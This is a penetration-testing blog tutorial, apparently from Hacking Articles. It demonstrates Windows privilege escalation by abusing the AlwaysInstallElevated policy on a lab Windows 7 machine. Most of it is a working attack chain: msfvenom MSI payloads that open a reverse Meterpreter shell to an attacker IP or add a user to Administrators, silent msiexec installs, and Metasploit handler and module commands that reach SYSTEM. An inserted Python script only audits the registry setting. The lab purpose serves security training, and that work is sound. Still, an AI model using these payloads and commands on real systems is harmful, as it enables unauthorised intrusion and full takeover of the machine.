Hello Friends!! In this article we are demonstrating a Windows privilege escalation method that abuses the AlwaysInstallElevated policy. In penetration testing, when we spawn a command shell as a local user, it is possible to exploit vulnerable features (or configuration settings) of Windows Group Policy to further elevate that user to admin privileges and gain administrator access.
Table of Content
- Introduction
- Lab setup
- Spawn command shell as local user
- Escalate privilege manually via .msi payload (Msfvenom)
- Escalate privilege via adding a user to the Administrators group (Msfvenom)
- Escalate privilege via Post exploit (Metasploit)
Introduction
AlwaysInstallElevated Policy
As we all know, Windows ships with the Windows Installer engine, which is used by MSI packages to install applications. These MSI packages can be configured to install with elevated privileges even when launched by non-admin users.
For this purpose the AlwaysInstallElevated policy is used to install an MSI package file with elevated (SYSTEM) privileges. When this policy is enabled in the Local Group Policy Editor, it directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This makes a machine vulnerable and poses a high security risk, because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.
Caution Note: This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence it should be used for lab purposes only (and not in a production environment).
Lab set-up
Victim’s Machine: Windows 7
Attacker’s machine: Kali Linux
To make this policy effective [i.e. install a package with elevated (SYSTEM) privileges], we need to ensure that the victim machine is deliberately made vulnerable by enabling the AlwaysInstallElevated policy in both the Computer Configuration and User Configuration folders of the Local Group Policy Editor.
For the Windows configuration
Type gpedit.msc in the Run dialog box of the Start Menu on the Windows 7 machine and the Local Group Policy Editor window will open.
Change the settings of the AlwaysInstallElevated policy
- For the Computer Configuration
Navigate to the below path in the Local Group Policy Editor
Computer Configuration\Administrative Templates\Windows Components\Windows Installer
Enable the "Always install with elevated privileges" setting
- For the User Configuration
Navigate to the below path in the Local Group Policy Editor
User Configuration\Administrative Templates\Windows Components\Windows Installer
Enable the "Always install with elevated privileges" setting
This completes the lab setup on the Windows machine. Now let’s proceed to our actual task.
Spawning Victim’s Machine
We need to compromise the Windows victim machine at least once to gain a meterpreter session. As you can observe, we already have the victim’s meterpreter session. Let’s open msfconsole and check the existing sessions
msfconsole
sessions
As we can see, a session already exists with ID 1. Now let’s open session 1 and extract the user details
msf > sessions 1
meterpreter > getuid
As we can see that we are logged into this session with the username as raj.
Note: The user “raj” already exists on the Windows 7 victim machine and is a non-admin user
Now let’s open the command shell of the target machine
meterpreter > shell
Upon executing the shell command, we land in the user’s Downloads folder C:\Users\raj\Downloads
We will now run the registry query commands in this command prompt to verify whether the Windows Installer has elevated privileges, as per the settings configured earlier
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
As we can see from the output, a value named “AlwaysInstallElevated” exists with a REG_DWORD value of 0x1, which means that the AlwaysInstallElevated policy is enabled.
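As an added defender-side check (not part of the original article), the following Python script parses the output of the two reg query commands above and reports whether the policy is actually effective, which requires the value to be 1 under both HKLM and HKCU; the sample transcripts embedded in it are constructed, not captured from the lab.

```python
"""Audit the AlwaysInstallElevated policy from `reg query` output.

Windows Installer honours the policy only when AlwaysInstallElevated is 1 under
BOTH HKLM and HKCU (the two keys queried in the article). Parsing the text that
`reg query` prints means this also works on a captured shell transcript.
"""
import re
import subprocess
import sys

POLICY_KEYS = {
    "HKLM": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKCU\Software\Policies\Microsoft\Windows\Installer",
}

# Matches a reg query value line such as:
#     AlwaysInstallElevated    REG_DWORD    0x1
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-f]+)\s*$", re.I | re.M)


def parse_reg_query(output: str):
    """Return the DWORD value, or None if the key or value is absent."""
    match = VALUE_RE.search(output)
    return int(match.group(1), 16) if match else None


def assess(hklm_output: str, hkcu_output: str) -> dict:
    """Combine both hives; the policy is effective only if both are set to 1."""
    hklm, hkcu = parse_reg_query(hklm_output), parse_reg_query(hkcu_output)
    return {"HKLM": hklm, "HKCU": hkcu, "effective": hklm == 1 and hkcu == 1}


def query_live() -> dict:
    """Run reg query on this Windows host (reading these keys needs no admin rights)."""
    outputs = {}
    for hive, key in POLICY_KEYS.items():
        proc = subprocess.run(["reg", "query", key], capture_output=True, text=True)
        outputs[hive] = proc.stdout  # a missing key yields empty stdout
    return assess(outputs["HKLM"], outputs["HKCU"])


# Constructed sample transcripts (not captured from the article's lab machine)
SAMPLE_ENABLED = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    live = sys.platform == "win32"
    print(query_live() if live else assess(SAMPLE_ENABLED, SAMPLE_MISSING))
```

On a Windows host the script queries the registry live; elsewhere it evaluates the constructed samples, which shows that a value set in only one hive is reported as not effective.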
Privilege Escalation via .msi payload (1st Method)
Now let’s open a new terminal on the Kali machine and generate an MSI package file (1.msi) using the Windows Meterpreter payload as follows
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 -f msi > /root/Desktop/1.msi
In the existing Meterpreter session of the user, let’s upload our MSI file 1.msi to the target machine as follows. Once it is uploaded successfully, we will then drop to the shell
upload /root/Desktop/1.msi .
Note: Before executing the MSI package file, start an MSF handler in another terminal window (refer to the handler commands given after the screenshot below)
Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i 1.msi
/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation
In a parallel window, we had opened a new handler before executing the .msi file
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.120
msf exploit(handler) > set lport 4567
msf exploit(handler) > exploit
Finally we got the meterpreter session using this exploit!! Let’s have a further look at the details of the user privileges we gained on this system
meterpreter > getsystem
meterpreter > getuid
Fantastic!! We have obtained the Local System account (NT AUTHORITY\SYSTEM), which has the highest level of privileges on the local system.
Adding user in Administrators Group (2nd Method)
In this method we will choose a non-admin user from the existing list of users on the target machine and then try to elevate his privileges. Here we will send the relevant Windows commands to the target machine using Metasploit’s windows/exec payload.
First let us check the details of the existing users on the victim machine. Here we can select any user; let’s select a user named “raaz” who is a non-admin user
net user
We can verify that the user “raaz” is in the local Users group by running the following in the command prompt
net user raaz
Generate an MSI package (2.msi) with the windows/exec payload that carries a command adding the user “raaz” to the local Administrators group on the target machine.
msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f msi > /root/Desktop/2.msi
Now let’s upload the MSI file 2.msi to the target machine as follows
Note: Before uploading the MSI file, press Ctrl+Z to exit the victim machine’s command shell and return to the meterpreter prompt
In the meterpreter shell type
upload /root/Desktop/2.msi .
Once the MSI file is uploaded successfully, we will drop to the command shell and execute the installer file
shell
msiexec /quiet /qn /i 2.msi
We can verify that the user “raaz” has been added to the local Administrators group by running the following in the command prompt
net user raaz
As we can see from the screenshot, the user raaz is now a member of the local Administrators group
Awesome!! We have escalated the privileges of the non-admin user using the manual exploit.
Privilege Escalation via Metasploit Post Exploit (3rd Method)
In order to perform privilege escalation by abusing the AlwaysInstallElevated policy, we can also use Metasploit’s built-in module as follows:
Now let’s use this exploit
msf > use exploit/windows/local/always_install_elevated
msf exploit(always_install_elevated) > set session 1
msf exploit(always_install_elevated) > exploit
We got the meterpreter session using the built-in exploit as well!! Now let’s have a further look at the details of the user privileges
meterpreter > getsystem
meterpreter > getuid
Hurrah!! We have obtained the Local System account (NT AUTHORITY\SYSTEM), which has the highest level of privileges on the local system
Note: We have shown one of the methodologies to elevate privileges. This lab can be performed in multiple ways, as there are many other methods of performing Windows privilege escalation.
Author: Ankur Sachdev is an Information Security consultant and researcher in the field of Network & WebApp Penetration Testing.
The post Windows Privilege Escalation (AlwaysInstallElevated) appeared first on Hacking Articles.